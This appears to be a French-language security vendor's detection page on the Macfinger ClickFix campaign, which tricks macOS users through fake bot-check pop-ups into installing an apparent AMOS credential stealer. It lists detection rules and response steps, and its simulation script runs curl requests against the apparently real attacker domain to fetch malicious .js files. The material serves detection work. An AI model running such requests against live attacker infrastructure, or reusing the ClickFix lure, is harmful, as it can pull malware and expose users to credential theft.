Campagne Macfinger ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Une nouvelle campagne d’ingénierie sociale suivie sous le nom de Macfinger ClickFix cible les utilisateurs de macOS en injectant des scripts malveillants dans des sites web légitimes. L’attaque présente des pages de protection contre les robots factices qui trompent les victimes en exécutant des commandes qui téléchargent des malwares spécifiques à macOS. La charge utile semble être une variante du voleur macOS Atomic (AMOS) conçue pour voler des identifiants et d’autres informations utilisateur.
Enquête
L’enquête a identifié des sites web légitimes compromis avec des scripts injectés qui affichent de faux pop-ups de vérification. L’analyse du trafic réseau a révélé un domaine dédié utilisé pour le suivi des utilisateurs, avec plusieurs adresses IP soutenant la livraison de logiciels malveillants et les communications de Commandement et de Contrôle (C2). Les schémas de trafic observés indiquent une exfiltration d’informations d’identifiants et de système via des requêtes HTTP POST.
Atténuation
Les utilisateurs doivent être formés pour éviter de suivre les instructions présentées par des pop-ups inattendus du navigateur ou des pages de vérification de robots factices. Les organisations doivent déployer un filtrage web pour bloquer les domaines malveillants connus et les adresses IP associées aux campagnes ClickFix. La surveillance des connexions sortantes inhabituelles vers des adresses IP non fiables sur des ports non standard est également recommandée.
Réponse
Si une activité de Macfinger ClickFix est détectée, les hôtes macOS affectés doivent être immédiatement isolés pour arrêter toute exfiltration de données supplémentaire. Les intervenants doivent effectuer une enquête judiciaire complète pour déterminer l’étendue de la compromission des identifiants. Les identifiants potentiellement exposés devraient être réinitialisés, et les systèmes devraient être vérifiés pour des mécanismes de persistance tels que des scripts shell non autorisés ou des binaires Mach-O.
Flux d’attaque
Nous mettons toujours à jour cette partie.
Détections
Tentative possible de communication de domaine par recherche IP (via dns)
Commande et contrôle suspect par demande DNS de domaine de premier niveau inhabituel (TLD) (via dns)
Tentative possible d’énumération System_profiler (via process_creation)
Manipulation possible de chaînes encodées en Base64 [MacOS] (via cmdline)
Tentative suspecte d’exécution de Curl [MacOS] (via cmdline)
IOCs (HashSha256) pour détecter : campagne Macfinger ClickFix
IOCs (SourceIP) pour détecter : campagne Macfinger ClickFix
IOCs (DestinationIP) pour détecter : campagne Macfinger ClickFix
Détecter le trafic de la campagne Macfinger ClickFix [Pare-feu]
Détecter l’injection de script Macfinger ClickFix [Serveur web]
Exécution de simulation
-
Narration et commandes de l’attaque : Un adversaire utilise une technique d’ingénierie sociale connue sous le nom de « ClickFix », où un utilisateur est invité à cliquer sur un bouton (souvent un faux « correctif » ou « mise à jour ») qui exécute un script malveillant. Dans cette simulation, nous imitons la phase finale : le navigateur/agent côté client effectuant une requête vers le domaine contrôlé par Macfinger
velvet-otter-glagceis.lifepour récupérer un.jsfichier malveillant. Cette demande est conçue pour correspondre à l’un des trois critères de sélection spécifiques dans la logique de détection. -
Script de test de régression :
#!/bin/bash # Script de simulation pour déclencher la règle de détection Macfinger ClickFix echo "[*] Démarrage de la simulation Macfinger ClickFix..." # Cible 1 : sélection1 (paramètre site) echo "[*] Simulation de la requête vers sélection1..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload" # Cible 2 : sélection2 (fichier de hachage spécifique) echo "[*] Simulation de la requête vers sélection2..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js" # Cible 3 : sélection3 (fichier ext-b) echo "[*] Simulation de la requête vers sélection3..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js" echo "[+] Simulation complète. Vérifiez les alertes dans le SIEM." -
Commandes de nettoyage :
# Aucun nettoyage local requis car ce sont des requêtes réseau sortantes. # Si des fichiers locaux ont été créés, supprimez-les : rm -f /tmp/macfinger_test_*